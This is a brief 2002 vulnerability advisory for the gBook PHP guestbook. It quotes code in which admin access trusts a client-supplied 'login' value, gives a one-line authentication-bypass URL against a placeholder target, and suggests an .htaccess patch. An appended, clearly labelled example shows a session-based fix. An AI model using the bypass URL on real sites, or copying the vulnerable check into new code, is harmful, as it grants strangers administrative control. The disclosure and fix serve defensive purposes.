gBook

by Nikola Strahija on October 23rd, 2002

Language : PHP
Tested version : 1.4
Problem : Admin access


PHP Code :
/gb/index.php :
------------------------------------------------------
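<?php
include("config.inc.php");
if ($action == "login") {
    if ($user == $loginu && $pw == $loginpw)
    {
        // A successful login is recorded only in a client-side cookie.
        setcookie("login", "true", time()+3600);
        header("location: index.php");
    }
    else
    {
        setcookie("login", "false", -3600);
        header("location: index.php?fehler=login");
    }
}
?>
[...]
// $login is a request-supplied value, so the client decides whether this is true.
if ($login == "true")
{
    [ADMIN CODE]
[...]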
------------------------------------------------------

Exploit :
http://[Target]/gb/index.php?login=true

Patch :
Use .htaccess to restrict access.
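
A code-level fix for the check shown above, as an added example that is not part of the original advisory or gBook's own code: the login state is kept server-side and the admin check never reads a request-supplied value. The function names try_login() and is_admin(), the session key is_admin, the form field names user and pw, and the credential values are assumptions; $loginu and $loginpw are the names used in the excerpt.

```php
<?php
// Added example, not gBook's own code. $loginu / $loginpw mirror the names
// in the advisory's excerpt; the values below are constructed.
$loginu  = 'admin';
$loginpw = 'constructed-password';

// Credentials are taken only from the POST body passed in, never from globals.
function try_login(array $post, array &$session, string $u, string $pw): bool
{
    // is_string() rejects array-valued fields such as user[]=x.
    $user = isset($post['user']) && is_string($post['user']) ? $post['user'] : '';
    $pass = isset($post['pw'])   && is_string($post['pw'])   ? $post['pw']   : '';
    // Run both comparisons in constant time before combining the results.
    $userOk = hash_equals($u, $user);
    $passOk = hash_equals($pw, $pass);
    $session['is_admin'] = $userOk && $passOk;   // state lives server-side
    return $session['is_admin'];
}

// The admin check consults server-side state only. $_GET, $_POST and
// $_COOKIE are never consulted, so a login=true parameter has no effect.
function is_admin(array $session): bool
{
    return isset($session['is_admin']) && $session['is_admin'] === true;
}

// Wiring inside a web request (hypothetical, matching the excerpt's flow):
//   session_start();
//   if (($_GET['action'] ?? '') === 'login'
//       && try_login($_POST, $_SESSION, $loginu, $loginpw)) {
//       session_regenerate_id(true);   // fresh session id after login
//   }
//   if (is_admin($_SESSION)) { /* [ADMIN CODE] */ }

// Constructed requests, runnable from the PHP CLI.
$session = [];
var_dump(is_admin($session));   // no login yet; a forged parameter is never read
try_login(['user' => 'admin', 'pw' => 'wrong'], $session, $loginu, $loginpw);
var_dump(is_admin($session));   // after a failed login
try_login(['user' => 'admin', 'pw' => 'constructed-password'], $session, $loginu, $loginpw);
var_dump(is_admin($session));   // after a correct login
```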

More details in French :
http://www.frog-man.org/tutos/gBook.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FgBook.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
